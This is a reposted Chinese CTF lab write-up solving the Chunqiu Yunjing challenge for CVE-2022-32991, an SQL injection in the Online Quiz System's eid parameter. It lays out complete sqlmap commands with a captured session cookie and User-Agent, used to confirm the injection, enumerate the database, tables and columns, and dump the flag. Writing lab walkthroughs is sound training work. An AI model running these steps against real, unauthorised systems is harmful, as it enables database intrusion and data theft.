您的位置:首页 > 财经 > 金融 > 春秋云境靶场之CVE-2022-32991

春秋云境靶场之CVE-2022-32991

2024/11/18 10:26:41 来源:https://blog.csdn.net/qq_58091216/article/details/142228328  浏览:    关键词:春秋云境靶场之CVE-2022-32991

一.访问靶场

1.打开靶场环境

提示我们存在SQL,那么我们就进行SQL注入

2.访问靶场

http://eci-2ze2pi1s2m6ut2vkoyzl.cloudeci1.ichunqiu.com/

我们可以看到一个登录页面,但是我们没有用户名和密码

右下角可以进行注册,我们注册一个账号

3.注册用户名

然后我们进行登录,登录成功

二.SQL注入

1.测试注入点

我们可以看到有3个页面,我们进行访问,可以看到第2个页面和第3个页面的eid不一样,但是n和t是一样的

可以猜测存在SQL注入,我们使用sqlmap进行测试,这里一个知识点,我们不能直接进行注入,如果我们直接输入Login | Online Quiz Systemicon-default.png?t=O83Ahttp://eci-2ze3l98vx2hzkuuo3lns.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10这个链接的话是注入不成功的,因为它是一个登录页面,需要身份验证,所以我们必须加入User-Agent和cookie

我们通过burp进行抓包,查看cookie

正确的测试点是

sqlmap -u "http://eci-2ze3l98vx2hzkuuo3lns.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=100" -p "eid" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0" --cookie="PHPSESSID=p570631e6k2fta6sq1oag3id7b",我们可以看到存在SQL注入

2.爆破数据库

sqlmap -u "http://eci-2ze3l98vx2hzkuuo3lns.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=100" -p "eid" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0" --cookie="PHPSESSID=p570631e6k2fta6sq1oag3id7b" --dbs --batch

我们可以看到有4个数据库,其中一个是flag,我们进行爆破

3.爆破表名

sqlmap -u "http://eci-2ze3l98vx2hzkuuo3lns.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=100" -p "eid" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0" --cookie="PHPSESSID=p570631e6k2fta6sq1oag3id7b" -D "ctf" --tables --batch

表名有9个,我们还是爆破flag

4.爆破字段名

sqlmap -u "http://eci-2ze3l98vx2hzkuuo3lns.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=100" -p "eid" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0" --cookie="PHPSESSID=p570631e6k2fta6sq1oag3id7b" -D "ctf" -T "flag" --columns

字段名是flag,那么我们直接爆破即可

5.爆破数据名

sqlmap -u "http://eci-2ze3l98vx2hzkuuo3lns.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=100" -p "eid" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0" --cookie="PHPSESSID=p570631e6k2fta6sq1oag3id7b" -D "ctf" -T "flag" -C "flag" --dump

我们可以看到flag,进行提交即可

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com